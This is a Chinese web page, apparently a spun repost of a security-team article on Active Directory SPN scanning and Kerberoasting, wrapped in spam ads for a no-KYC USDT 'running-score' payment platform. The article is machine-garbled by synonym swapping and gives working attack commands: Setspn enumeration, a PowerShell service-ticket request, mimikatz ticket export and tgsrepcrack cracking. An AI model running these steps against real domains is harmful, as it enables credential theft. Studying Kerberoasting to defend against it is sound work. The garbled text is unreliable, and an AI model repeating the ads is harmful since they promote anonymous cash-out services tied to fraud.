usdt官网下载(www.caibao.it):平安手艺 | 域渗透之SPN

admin/2021-02-24/ 分类:淮南科技/阅读:

USDT官网

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。在内网中,SPN扫描通过查询向域控服务器执行服务发现,可以识别正在运行主要服务的主机,如终端,交换机等。SPN的识别是Kerberoasting攻击的第一步。本文由锦行科技的平安研究团队提供,旨在通过对SPN举行先容,辅助人人深入领会Kerberoasting攻击历程以应对该种攻击。

SPN

SPN(ServicePrincipal Names)服务主体名称,是服务实例(好比:HTTP、SMB、MySQL等服务)的唯一标识符。Kerberos认证历程使用SPN将服务实例与服务登录账户相关联,若是想使用 Kerberos 协议来认证服务,那么必须准确设置SPN。

SPN分为两种类型:
1.一种是注册在流动目录的机械帐户(Computers)下,当一个服务的权限为 Local System 或 Network Service,则SPN注册在机械帐户(Computers)下。
2.一种是注册在流动目录的域用户帐户(Users)下,当一个服务的权限为一个域用户,则SPN注册在域用户帐户(Users)下。

SQLServer在每次启动的时刻,都会去尝试用自己的启动账号注册SPN

在Windows域里,默认通俗机械账号有权注册SPN:

域:test.com
机械名:W10b
域机械账号(system)
(手动注册)乐成注册

通俗域用户账号是没有权注册SPN:
域:test.com
机械名:W10b
通俗域用户:testfw
(手动注册)权限不够


这就会导致这样一个征象,SQL Server若是使用“Local System account”来启动,Kerberos就能够乐成,由于SQL Server这时可以在DC上注册SPN。若是用一个通俗域用户来启动,Kerberos就不能乐成,由于这时SPN注册不上去。

在DC上为域账号赋予 “Read servicePrincipalName” 和 “Write serverPrincipalName” 的权限

,

Usdt第三方支付接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,

勾上serverPrincipalName的读写权限:

再次使用通俗域用户注册,乐成注册

Kerberoasting攻击

域内的任何一台主机用户或通俗域用户,都可以通过查询SPN,向域内的所有服务请求TGS,然后举行暴力破解,然则对于破解出的明文,只有域用户的是可以行使的,机械账户的不能用于远程毗邻,以是我们的关注点主要就在域用户下注册的SPN。

发现SPN

Setspn -Q */*

请求SPN

(powershell)

Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sqlsrv.test.com:1433"

导出票据

mimikatz , kerberos::list /export

破解票据

https://github.com/nidem/kerberoast

python3 tgsrepcrack.py pass.txt "2-40a10000-w10a$@MSSQLSvc~sqlsrv.test.com~1433-TEST.COM.kirbi"

若是获得的是一个有权注册SPN的域账号,也可以通过手动注册的方式来举行Kerberoasting攻击。

TAG:技术
阅读:
广告 330*360
广告 330*360
淮南新闻网
微信二维码扫一扫
关注微信公众号
新闻自媒体 Copyright © 2002-2019 淮南新闻网 版权所有
二维码
意见反馈 二维码